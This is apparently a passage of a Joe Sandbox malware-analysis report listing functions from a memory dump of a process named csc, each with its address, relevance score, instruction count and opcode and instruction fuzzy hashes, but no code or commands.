                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab5f1fbcb52686b230f7986e59d945e05f7f88cfa279feca1fe3ff738f9f9b40
                                                                                  • Instruction ID: 077e696dff2af7d94164acd8a4205899c45e7e1a4b2069e7e5c13e43cdfa470b
                                                                                  • Opcode Fuzzy Hash: ab5f1fbcb52686b230f7986e59d945e05f7f88cfa279feca1fe3ff738f9f9b40
                                                                                  • Instruction Fuzzy Hash: 9BE1AE71608341CFC715CF28C094A6ABBE2FF8A314F058A6DE9998B351DB71E905DF92
                                                                                  Function 05738397 Relevance: .4, Instructions: 380COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3221eed84d2d15f0cba0c5951cec094f7ff3c85f3a2004391cc8553d31bc7cff
                                                                                  • Instruction ID: 955cea5ea59fbcc70cda66198e113f4a48f7274a00de1256fd7c5e2be02ffa15
                                                                                  • Opcode Fuzzy Hash: 3221eed84d2d15f0cba0c5951cec094f7ff3c85f3a2004391cc8553d31bc7cff
                                                                                  • Instruction Fuzzy Hash: 50D1F371B052069FCF18CF65D886EBA77E6BF44324F044629F856DB281E730E940EB62
                                                                                  Function 057D6E20 Relevance: .4, Instructions: 379COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bec1a022aa459b10520ab118cdf9c3a1042804d374543d27536c9ba63b4fbad4
                                                                                  • Instruction ID: 915b4da0eefbf74b381b4c70e9fd3ee60cf30b176b6b5384f31deaef7718adb9
                                                                                  • Opcode Fuzzy Hash: bec1a022aa459b10520ab118cdf9c3a1042804d374543d27536c9ba63b4fbad4
                                                                                  • Instruction Fuzzy Hash: 9BE10870E042599BCF14CFA8C981ABEFBF6BF49344F148199E845AB241E335E945DBB0
                                                                                  Function 0576EF28 Relevance: .3, Instructions: 347COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f685eaa4d4714d312f8bc30322825ea859b21e6d04e8f3fbdf1dc2663d3a39a2
                                                                                  • Instruction ID: e7eebba30e70134938b7a4c7212d8aedd0e3007cfee7d5d8533146b7deaf628f
                                                                                  • Opcode Fuzzy Hash: f685eaa4d4714d312f8bc30322825ea859b21e6d04e8f3fbdf1dc2663d3a39a2
                                                                                  • Instruction Fuzzy Hash: 00E11275E04608DFCF25CFA9D984AADBBF6FF48310F24452AE946A7264D770A841EF10
                                                                                  Function 057C8243 Relevance: .3, Instructions: 322COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction ID: 608139375c4e6fbd615b800731310d1c797cb148c962037fb237bd5229c1e07d
                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction Fuzzy Hash: 79B15275B00608AFDF24DF95C948FABBBBABF84304F10449EA94397790DA74E905EB11
                                                                                  Function 05750535 Relevance: .3, Instructions: 300COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction ID: a90c2fac532c8c071f2709ffdbdc42d5bba66fd741d7bb7ca03c8b06c8a3a2a1
                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction Fuzzy Hash: 3EB1F272704645AFDF21DB64C848FBEB7F6BF84310F180665D95297281DBB0E941EB90
                                                                                  Function 05760DE1 Relevance: .3, Instructions: 295COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 56bfbc24514e047bb9b615b4d33ea48b4a3b4b5e3ec86f2c7a2d8969a239ee2b
                                                                                  • Instruction ID: 5069beb55a311f36d6077e5d7ceba5e9c82e66da632712b607a957db103e53ce
                                                                                  • Opcode Fuzzy Hash: 56bfbc24514e047bb9b615b4d33ea48b4a3b4b5e3ec86f2c7a2d8969a239ee2b
                                                                                  • Instruction Fuzzy Hash: FDC17D71E04359DFDB15DFA9C888AADBBB6FF88304F104529E805AB255EB70A941EF40
                                                                                  Function 057483C0 Relevance: .3, Instructions: 281COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 006202266400f937519fa5c232aa752b96938603b3287c54583b7d8e58032418
                                                                                  • Instruction ID: b3f17907801c7b8028d9a39ffaf385b6caa5636d5a57d1fb737555e6f5ce6301
                                                                                  • Opcode Fuzzy Hash: 006202266400f937519fa5c232aa752b96938603b3287c54583b7d8e58032418
                                                                                  • Instruction Fuzzy Hash: 56C168756083848FE764CF19C494BABB7E5FF88304F44496DE98A8B290D774E908DF92
                                                                                  Function 0573C427 Relevance: .3, Instructions: 280COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70dc1ca4417c08c2c698fd623fbfffba4d8613cd639226569e698db63d0480b0
                                                                                  • Instruction ID: 3223897a95676da0cdb1fd707a3af28f3c48709775b01de7ee8eb1b7dbcd7f4b
                                                                                  • Opcode Fuzzy Hash: 70dc1ca4417c08c2c698fd623fbfffba4d8613cd639226569e698db63d0480b0
                                                                                  • Instruction Fuzzy Hash: 6BB18F70B042658BDB25DF65C885BB9B3B6FF44710F1085EAD40AE7281EB30DD85DB20
                                                                                  Function 0576E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf2eeb3187598854d1fa564bd7c6ec3a18dbeddadae5413e7880b7f23f28f7f6
                                                                                  • Instruction ID: ca11657a437ec7dc91bd5dbd87a6f66d34ee4b8d4f31800529792938394f2f51
                                                                                  • Opcode Fuzzy Hash: bf2eeb3187598854d1fa564bd7c6ec3a18dbeddadae5413e7880b7f23f28f7f6
                                                                                  • Instruction Fuzzy Hash: 79A1F73AE046149FEB21DF58C84CFAEBBBABF41754F050265ED01AB290D7749D40EBA1
                                                                                  Function 05780185 Relevance: .3, Instructions: 276COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 47f6f22c5a34cbe4775a6be8b8dc5960b66a728aa2f98200b6494a8373b43a65
                                                                                  • Instruction ID: 4c8a7907c36f9f7174dff93960a142d75a68da34e8d0125d3f22776f249b7a2a
                                                                                  • Opcode Fuzzy Hash: 47f6f22c5a34cbe4775a6be8b8dc5960b66a728aa2f98200b6494a8373b43a65
                                                                                  • Instruction Fuzzy Hash: 2AA1C070B40615DFEB24EF65C898BBAB7B6FF45314F104029EA1997381EB74E805EB90
                                                                                  Function 05814500 Relevance: .3, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11a5517104c8214bd6da2f0732097816c7d704c78b8a587554af381d28630ad3
                                                                                  • Instruction ID: 0940ecff6b104932639041344f41561dc50c2a795b6a90090479ce893a5bb6a7
                                                                                  • Opcode Fuzzy Hash: 11a5517104c8214bd6da2f0732097816c7d704c78b8a587554af381d28630ad3
                                                                                  • Instruction Fuzzy Hash: A4A1CC72A14201AFCB11DF18C985F6AB7EAFF48758F150928ED49DB260D774EC01CB95
                                                                                  Function 057C60E0 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 73e95d0c893434adf5e9a3446084ba42527305071ec97c5ee3de11cd614785c7
                                                                                  • Instruction ID: 39e214396bc744c6a54cccb8db02d2bf12ca33647cb97d74684c9aae15070ac0
                                                                                  • Opcode Fuzzy Hash: 73e95d0c893434adf5e9a3446084ba42527305071ec97c5ee3de11cd614785c7
                                                                                  • Instruction Fuzzy Hash: 13917071E04215AFDF15CFACD8D8BAEBFB5AF48710F1541ADE911AB241D734E900ABA0
                                                                                  Function 0575E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36186773ffb902fb38d8c24ce2ccc3df5099b190922180fd3e5f470b70556892
                                                                                  • Instruction ID: 270ca202d0779f8dd3ca23782054937657b205dce526f5c052776ff9512ab621
                                                                                  • Opcode Fuzzy Hash: 36186773ffb902fb38d8c24ce2ccc3df5099b190922180fd3e5f470b70556892
                                                                                  • Instruction Fuzzy Hash: A8913532B006159BDB25DB29C888B7E77A6FF84720F0541A5ED06DB340EBB4DE01E7A0
                                                                                  Function 05736D10 Relevance: .2, Instructions: 216COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed4d350f8f94d0eac7db90ad0b427da0ee9d915ac4cb9299cb91f256f99e8fad
                                                                                  • Instruction ID: 8857f57233b97ab60c0c20d128706d97c082e1136d647fe335f9b6147be75f9f
                                                                                  • Opcode Fuzzy Hash: ed4d350f8f94d0eac7db90ad0b427da0ee9d915ac4cb9299cb91f256f99e8fad
                                                                                  • Instruction Fuzzy Hash: 84718475608312ABEF28CF25E984B7AB7E5BB85350F04492DFA55D7200E730E844DBE2
                                                                                  Function 0577E284 Relevance: .2, Instructions: 212COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: becd5fc8d276952eb91661ad7a923c7549b341fd072ad9918b569ba0e24e97f0
                                                                                  • Instruction ID: 09a050f008599f3b12ca6a608dd9fb4d7b765d04bfcbe19e46c3dfceaa1a1600
                                                                                  • Opcode Fuzzy Hash: becd5fc8d276952eb91661ad7a923c7549b341fd072ad9918b569ba0e24e97f0
                                                                                  • Instruction Fuzzy Hash: 03819E71A00609AFDB25CFA4D884FEEB7FAFF48304F104429E956A7210DB70AC45EB60
                                                                                  Function 0575C640 Relevance: .2, Instructions: 206COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8d39c61b3b3122016275e9bccf1004da677e85ad53bbadd0bbf3519f94243cde
                                                                                  • Instruction ID: bc18c20e7e6d217605feec6549728957eab10c8ed2ee0f07e39039c9e373fb66
                                                                                  • Opcode Fuzzy Hash: 8d39c61b3b3122016275e9bccf1004da677e85ad53bbadd0bbf3519f94243cde
                                                                                  • Instruction Fuzzy Hash: 8E71BE75908265DFCB26CF59D450BBEBBB5FF88710F14465AEC42AB350E7749800DB90
                                                                                  Function 057D8D6B Relevance: .2, Instructions: 206COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05e7620814a2bff9e780a9063fb0d35195a71d42b507d840365bf71f006dd35e
                                                                                  • Instruction ID: b213d5ed36d7a8d3cde9d060ce6a1eb41fb936972ad7c4680966fc911141d117
                                                                                  • Opcode Fuzzy Hash: 05e7620814a2bff9e780a9063fb0d35195a71d42b507d840365bf71f006dd35e
                                                                                  • Instruction Fuzzy Hash: 2671C270A041669FCB14DF59C844ABEFBF6FF45300F048499E894DB241E335DA45DBA1
                                                                                  Function 0575260B Relevance: .2, Instructions: 201COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9fa4a4428d01eda04154095409e5b535efa084039dfa211571cb769e0bc8245c
                                                                                  • Instruction ID: 5b6983d4d2cd253f13ebb42f3e75df93eb1edb75ff41a4e08e0f105871e0046b
                                                                                  • Opcode Fuzzy Hash: 9fa4a4428d01eda04154095409e5b535efa084039dfa211571cb769e0bc8245c
                                                                                  • Instruction Fuzzy Hash: 4671C476B046418FC311DF28C488B6AB7E6FF84320F0585A9EC55CB752DB74D845DB91
                                                                                  Function 057C035C Relevance: .2, Instructions: 198COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                  • Instruction ID: f7aff9110b7f8c1d7a1a2d54f2c5aaf213ee63d1fa01dee9a8eb762486ed58ef
                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                  • Instruction Fuzzy Hash: 75716071A00619EFCB10DFA5C948EEEBBB9FF48710F10456DE905A7250DB34EA41DB90
                                                                                  Function 057D62A0 Relevance: .2, Instructions: 198COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c6f51174f32f8c8cfa6920905f429b1e57cffbcf3e3d081c5229768b4336a2c5
                                                                                  • Instruction ID: 09034b7912d0efd762e6c414929cce2235f67a7b590ba7fa3b90bb526810cc8f
                                                                                  • Opcode Fuzzy Hash: c6f51174f32f8c8cfa6920905f429b1e57cffbcf3e3d081c5229768b4336a2c5
                                                                                  • Instruction Fuzzy Hash: 1271D032240701AFD722DF14C848F6AFBF6FF44760F154928E6568B2A0DB75E944EB60
                                                                                  Function 0577CDB1 Relevance: .2, Instructions: 197COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b282d88b5712317ae671cc0879d18ce3f8543fc67ed2f242ba0a7165aa74028d
                                                                                  • Instruction ID: 1fe899f043ce3901ad62b54a252ba31977ba21a10491f30b754f65d4f2b87d6a
                                                                                  • Opcode Fuzzy Hash: b282d88b5712317ae671cc0879d18ce3f8543fc67ed2f242ba0a7165aa74028d
                                                                                  • Instruction Fuzzy Hash: 97619FB1A00209DFDF19DF68D885BBEB7BABF08310F104569E912EB290DBB09D01DB51
                                                                                  Function 0573CF50 Relevance: .2, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                  • Instruction ID: e6ca4ae61b31964c6593ddac661c6114a87b222dc8bbb2d72110bd7c9ebee528
                                                                                  • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                  • Instruction Fuzzy Hash: 8F719EB2605B428FDB368F24D609B32B7E6BF407B1F540A1DD9D2069E2D730A841EB50
                                                                                  Function 0576EDD3 Relevance: .2, Instructions: 166COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10fe8b1f859f2f7ca280423b2a21e3ea03f7d70be765de4f530fe9d0de221e83
                                                                                  • Instruction ID: 9a6368d87c565b9bf14a95628178f2cc8c0d0fecf4978fc4fcd3ad7ca8d5e85d
                                                                                  • Opcode Fuzzy Hash: 10fe8b1f859f2f7ca280423b2a21e3ea03f7d70be765de4f530fe9d0de221e83
                                                                                  • Instruction Fuzzy Hash: E0519175704741DFEB20DF59C488B6BB7AAFF44319F50492DE80287651D7B4E844EBA0
                                                                                  Function 0576CDF0 Relevance: .2, Instructions: 165COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                  • Instruction ID: 55252baeffb8030c545a00481077acfd7685a985132a4c74ef7bc8beb6f5a540
                                                                                  • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                  • Instruction Fuzzy Hash: 93518176E0460ADFDB14CF98C5846EDB7BAFB88310F158269DC56BB200D734AA41DB54
                                                                                  Function 05808DAE Relevance: .2, Instructions: 162COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef92c68152ca65d67d4049af1d199bbf89fa8ca8bd8c4e1d5866a33f2661c356
                                                                                  • Instruction ID: 80d902ac8c4b4a24128ad3c48f9cb62ab05e817ddf810515466836932ebed53a
                                                                                  • Opcode Fuzzy Hash: ef92c68152ca65d67d4049af1d199bbf89fa8ca8bd8c4e1d5866a33f2661c356
                                                                                  • Instruction Fuzzy Hash: B65189726087129FD751DF28CC44BAAB7E6BF84350F048928FD86D7291DB34E948CB96
                                                                                  Function 0577E443 Relevance: .2, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 451960570d0afb5f15b046339803116b00262d40b3af6a68a813524422dfaf95
                                                                                  • Instruction ID: fdd331ee4a7dd2e397c1fedb3f72c8987cad3214fbd10e46e9cae2ce91e5ebae
                                                                                  • Opcode Fuzzy Hash: 451960570d0afb5f15b046339803116b00262d40b3af6a68a813524422dfaf95
                                                                                  • Instruction Fuzzy Hash: D3517171200A08DFDB21EF65D988FAAB3FDFF04794F500869EA5197260DB74E940EB50
                                                                                  Function 0576AE00 Relevance: .2, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                  • Instruction ID: 06200f2f2a274da34e739ef32661ab32184a5610c3ce658f554198be541e58d2
                                                                                  • Opcode Fuzzy Hash: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                  • Instruction Fuzzy Hash: 4851E0B2B11601DBCB26EF58C958F7A777AFB81764F154068EC01AB250C735DC01EB81
                                                                                  Function 057645B1 Relevance: .2, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                  • Instruction ID: 56996f927206edbdb5daf787ad8753cb73af34725ba53e415a24c148206f8ff1
                                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                  • Instruction Fuzzy Hash: 86518D71E0421AAFCF16DF94C484BEEBBB6BF85350F044169E905AB240D774DA44EBA1
                                                                                  Function 0573EFD8 Relevance: .2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d88f994072332476e66aa09980469e5a7dce10970c4833d423ad94d3479cb328
                                                                                  • Instruction ID: 89debc00f30c9787dfbd933ec010813e355b0fb28429273201f679b9f714b333
                                                                                  • Opcode Fuzzy Hash: d88f994072332476e66aa09980469e5a7dce10970c4833d423ad94d3479cb328
                                                                                  • Instruction Fuzzy Hash: 7B51A071A083019FC710DF18D889E6BB7E9FF88264F04486DF855C7252E734E905DBA2
                                                                                  Function 0573AE90 Relevance: .2, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a4ccd1a3c804d05e0ce5901bcac86674b0043629eeedaf8360a2d9e86c270340
                                                                                  • Instruction ID: 3d8552de3dbc268e9011fc53d34d3a8fbb83f7bc0487c22b2643954ae60c5683
                                                                                  • Opcode Fuzzy Hash: a4ccd1a3c804d05e0ce5901bcac86674b0043629eeedaf8360a2d9e86c270340
                                                                                  • Instruction Fuzzy Hash: B85108B1A08655DFCF1ADF68D487B7DBBB6BB48324F180519D846A3281D330EC40E7A5
                                                                                  Function 0577CC00 Relevance: .1, Instructions: 147COMMON
                                                                                  Download Yara Rule
